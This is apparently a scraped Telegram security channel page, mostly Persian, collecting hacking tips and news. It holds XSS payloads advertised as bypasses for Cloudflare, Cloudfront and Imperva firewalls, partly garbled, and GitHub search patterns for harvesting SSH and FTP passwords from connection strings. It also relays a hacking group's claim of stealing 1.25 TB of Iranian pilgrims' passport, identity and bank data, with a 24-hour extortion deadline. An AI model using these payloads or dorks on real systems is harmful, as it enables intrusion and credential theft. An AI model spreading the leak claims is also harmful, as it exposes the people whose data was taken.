Sharing my thoughts, discussing my projects, and traveling the world.
Contact: @borz
Last updated 1 week, 1 day ago
Telegram stands for freedom and privacy and has many easy to use features.
Last updated 1 week, 2 days ago
Official Graph Messenger (Telegraph) Channel
Download from Google Play Store:
https://play.google.com/store/apps/details?id=ir.ilmili.telegraph
Donation:
https://graphmessenger.com/donate
Last updated 5 months ago
[webapps] Helpdeskz v2.0.2 - Stored XSS
Helpdeskz v2.0.2 - Stored XSS
[webapps] Calibre-web 0.6.21 - Stored XSS
Calibre-web 0.6.21 - Stored XSS
? The English translation of all posts can be seen in the comments of the posts.
⭕️ سازمان حج و زیارت توسط irleak هک شد!!
اطلاعات استخراجی از سال ۱۳۶۳ تا ۱۴۰۳ با حجم ۱.۲۵ ترابایت هست.
دیتا شامل:
- نام، نامخانوادگی، نام پدر، تاریخ تولد، محل تولد، شماره شناسنامه، کد ملی، سریال کارت ملی، وضعیت تاهل، شغل
- اطلاعات تماس (آدرس منزل و محل کار، کد پستی، شماره تلفن ثابت و موبایل)
- اطلاعات دقیق استعلامی از پلیس گذرنامه (شماره پاسپورت، تاریخ صدور و انقضا) + اسکن پاسپورت
- عکس ۳*۴ زائرین
- اطلاعات پرواز زائرین
- اطلاعات بیمه زائرین
- اطلاعات سند وثیقه
- اطلاعات بانکی و پرداخت
- اطلاعات کامل کارگزاران حج
- اطلاعات وضعیت اسکان زائرین
- مشخصات کامل اعزامی مسئولین دولتی و حکومتی
- مشخصات کامل اعزامی سهمیهای مانند خانواده شهدا
- مشخصات کامل اعزامی نیروهای ناجا
- مشخصات کامل اعزامی نیروهای بسیج
- مشخصات کامل اعزامی روحانیون
- سورسکد اپلیکیشنها و سرویسهای سازمان
این گروه هکری مهلت ۲۴ ساعته به سازمان حج و زیارت داده تا وارد مذاکره بشه.
BugHuntingTips ?
SOME OF THE TOP XSS WAF BYPASS PAYLOADS :)
CloudFlare WAF:
klzzwxh:00010000000040document.cookie)>
Cloudfront WAF:
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/ ;window/*aabb*/'al'%2b'ert'; ">%0D%0A%0D%0A Imperva WAF: // 0xrayan [@h4shur](https://t.me/h4shur)چند روزه اینترنت توی ایران با اختلال سنگین مواجه که نتیجه حملات سایبری بوده به زیرساخت ارتباطی ایران.
علیرقم انتشار خبرهای متعدد با موضوعات ارتقای بخش های مختلف زیرساخت ارتباطی و افزایش ظرفیت ها، هیچ تغییر مثبتی رو شاهد نبودیم و چه بسا وضعیت بدتر از قبل هم شده!
وقتی توی بخش های مختلف زیرساخت ارتباطات کشوری شاهد انحصارطلبی بودیم اعم از خدماتی یا تجهیزات مختلف، باید انتظار این وضعیت نابسامان رو داشته باشیم.
به شخصه برای خودِ من باعث تأسف هست که این وضعیت پیش اومده و هیچ کدوم از آقایان مسئول اهمیتی براشون نداره و درکی از وضعیتی که ایجاد کردن ندارن.
فقط یک سوال، دوستانِ وزارت قطع ارتباطات دقیقا مشغول چه کاری هستن و بابت چه کاری دارن حقوق بیت المال میگیرن؟!!
@h4shur
توی سالی که گذشت، تجربه هک شدن داشتید؟
anonymous poll
?? – 21
??????? 91%
?? – 2
? 9%
? 23 people voted so far.
The new cs.github.com search allows for regex, new GitHub Dorks are possible!
Example: For getting SSH and FTP passwords via connection strings with:
/ssh:\/\/.:.@.target.com/
/ftp:\/\/.:.@.target.com/
// ckure
@h4shur
#tools #OSINT #Info ⭕️ Chiasmodon is an #OSINT (Open Source Intelligence) tool designed to assist in the process of gathering information about a target domain. Its primary functionality revolves around searching for domain-related data, including domain emails…
CVE-2024-20767 Adobe ColdFusion.
*
File system read vulnerability
// Kingsman
@h4shur
Sharing my thoughts, discussing my projects, and traveling the world.
Contact: @borz
Last updated 1 week, 1 day ago
Telegram stands for freedom and privacy and has many easy to use features.
Last updated 1 week, 2 days ago
Official Graph Messenger (Telegraph) Channel
Download from Google Play Store:
https://play.google.com/store/apps/details?id=ir.ilmili.telegraph
Donation:
https://graphmessenger.com/donate
Last updated 5 months ago